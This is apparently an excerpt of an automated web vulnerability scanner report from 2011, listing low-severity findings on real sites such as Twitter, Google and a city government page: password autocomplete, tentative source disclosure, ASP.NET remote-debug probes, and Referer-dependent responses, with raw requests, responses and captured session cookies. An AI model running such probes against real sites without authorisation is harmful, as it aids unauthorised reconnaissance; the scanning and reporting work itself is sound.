Set-Cookie: v=5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181135_458; expires=Sun, 04-Sep-2011 02:55:05 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 369
Date: Sun, 04 Sep 2011 02:25:05 GMT
Server: C10

_em._domain="nationmultimedia.com";_em.setCkVt("cff6b95a3706f313acc9b9e202024e62e18088e413-981323754e62e181");_em.setCkV("5fe7a94f70408cf438e50d7277324e62e18088e4f8-084548474e62e181");_em.setCkSv("-1"
...[SNIP]...

17. Password field with autocomplete enabled  previous  next
There are 8 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


17.1. http://member.bangkokpost.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: member.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:28:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post -
...[SNIP]...
</h2>
   <FORM id="xForm" name="xForm" action="../member_process.php" method="POST">
   <input type="hidden" id="xserviceID" name="xserviceID" value="10006">
...[SNIP]...
</label>
                           <input type="password" name="xPassword" id="xPassword" class="textfield" value=""/>
                           <span class="form-message">
...[SNIP]...

17.2. http://ndtvjobs.bixee.com/search/search/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ndtvjobs.bixee.com
Path:   /search/search/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search/search/ HTTP/1.1
Host: ndtvjobs.bixee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:57 GMT
Server: ibibo-WS
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="guestLeftNdtv" style="float:left">
           <form method="post" action="/job-seeker/submit_login/" onsubmit="return verifyLogin();">
<span class="welcomeGuestNdtv">
...[SNIP]...
<div class="passwordInput"><input type="password" onfocus="if (this.value == 'Password') {this.value = '';this.style.color = '#333';}else{this.style.color = '#333';}" onblur="if (this.value == '') {this.value = 'Password';this.style.color = '#c9c9c9';}" class="inputHomeNdtv" id="loginPassword" name="password" style = "color:#c9c9c9;" value="Password"/></div>
...[SNIP]...

17.3. http://truehits.net/stat.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Sun, 04 Sep 2011 04:21:20 GMT
Server: Apache
Content-Length: 38194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<td>
<form name="login" method="post" action="http://truehits.net/ch_pass.php">
<table width="130" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td style = "padding: 3px 3px 0px 3px">
<input name="passwd" type="password" class="inputtext" size="15" maxlength="20" />
</td>
...[SNIP]...

17.4. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315110097-4444-42884
ETag: "f3aa0f880c2502dd8a1fc6efdc403999"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 04:21:37 GMT
X-Runtime: 0.01042
Content-Type: text/html; charset=utf-8
Content-Length: 50542
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: d2a485766a9cd13863da9462007169475de76421
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOg9jcmVh%250AdGVkX2F0bCsInkxcMjIBIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlODg2NDBlNWY1ZjNh%250AOTg4OTg1YmM5NTRmYjhjOWY2ZTk%253D--de9055a2a76bb3b594d454950429cdebb31cd282; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...

17.5. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315110097-4444-42884
ETag: "f3aa0f880c2502dd8a1fc6efdc403999"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 04:21:37 GMT
X-Runtime: 0.01042
Content-Type: text/html; charset=utf-8
Content-Length: 50542
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: d2a485766a9cd13863da9462007169475de76421
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOg9jcmVh%250AdGVkX2F0bCsInkxcMjIBIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlODg2NDBlNWY1ZjNh%250AOTg4OTg1YmM5NTRmYjhjOWY2ZTk%253D--de9055a2a76bb3b594d454950429cdebb31cd282; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...

17.6. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315110097-4444-42884
ETag: "f3aa0f880c2502dd8a1fc6efdc403999"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 04:21:37 GMT
X-Runtime: 0.01042
Content-Type: text/html; charset=utf-8
Content-Length: 50542
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: d2a485766a9cd13863da9462007169475de76421
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOg9jcmVh%250AdGVkX2F0bCsInkxcMjIBIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlODg2NDBlNWY1ZjNh%250AOTg4OTg1YmM5NTRmYjhjOWY2ZTk%253D--de9055a2a76bb3b594d454950429cdebb31cd282; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...

17.7. http://twitter.com/search  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /search

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315110098-90234-27276
ETag: "402a4c8b99efa81d3ed3203f1a07dd26"
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 04 Sep 2011 04:21:38 GMT
X-Runtime: 0.02844
Content-Type: text/html; charset=utf-8
Content-Length: 20340
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4a8383b6427efce124e60f7521caec80b5ffa38e
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOhVpbl9u%250AZXdfdXNlcl9mbG93MDoPY3JlYXRlZF9hdGwrCJ5MXDIyASIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoHaWQiJTg4NjQwZTVmNWYzYTk4ODk4NWJjOTU0ZmI4YzlmNmU5--787a4de76984eb9be102d7b7a1c076115411b8e1; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="dbc99a99568e234aef5d0561562755da9aa19ef2" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

17.8. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:UhY4qMXCvp3NTNKf--q2r1Nifc6HrQ:L2EY7-CY6SBaF84x;Path=/accounts;Expires=Tue, 03-Sep-2013 04:39:06 GMT;Secure;HttpOnly
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Frame-Options: Deny
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Sun, 04 Sep 2011 04:39:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 11097
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

18. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D799abfc4d86c130b%26v%3D2%26c%3De08e7d44%26s%3D4e6300ee%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 04-Sep-2011 05:09:10 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:39:10 GMT
Expires: Sun, 04 Sep 2011 04:39:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<scrip
...[SNIP]...
<div class="searchbox">
<? # Set hidden input fields. # ?>
<form name="search-form"
id="search-form"
title="Search Help"
method="get"
action="/adsense/support/bin/search.py"
onsubmit="track('Search Help',
document.getElementById('query').value);return false;"
...[SNIP]...

19. ASP.NET debugging enabled  previous  next
There are 5 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



19.1. http://ads.indiatimes.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.indiatimes.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: ads.indiatimes.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 02:35:07 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.2. http://tidaltv.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tidaltv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: tidaltv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 10:58:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.3. http://www.modestogov.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.modestogov.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.modestogov.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 04:37:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.4. http://www.newspaperdirect.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newspaperdirect.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.newspaperdirect.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 39
Date: Sun, 04 Sep 2011 04:44:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private

Debug access denied to '/Default.aspx'.

19.5. http://www.tidaltv.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tidaltv.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tidaltv.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 11:08:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

20. Referer-dependent response  previous  next
There are 9 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



20.1. http://a.collective-media.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /optout

Request 1

GET /optout?na_optout_check=true&rand=212 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 11:13:39 GMT
Content-Type: text/html
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0

Request 2

GET /optout?na_optout_check=true&rand=212 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response 2

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

20.2. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Request 1

GET /ads/opt-out?op=check&src=NAI&j=&nocache=0.1253016 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 0
Date: Sun, 04 Sep 2011 11:00:17 GMT

Request 2

GET /ads/opt-out?op=check&src=NAI&j=&nocache=0.1253016 HTTP/1.1
Host: ads.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Content-Length: 0
Date: Sun, 04 Sep 2011 11:00:41 GMT


20.3. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ats.tumri.net
Path:   /ats/optout

Request 1

GET /ats/optout?nai=true&id=1936234986&nocache=0.7927026 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Sep 04 11:17:14 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 22-Sep-2079 14:31:21 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7927026&tu=1
Content-Length: 0
Date: Sun, 04 Sep 2011 11:17:14 GMT

Request 2

GET /ats/optout?nai=true&id=1936234986&nocache=0.7927026 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://www.tumri.com/privacy/status-failure.jpg
Content-Length: 0
Date: Sun, 04 Sep 2011 11:17:41 GMT


20.4. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.tradex.openx.com
Path:   /afr.php

Request 1

GET /afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030? HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
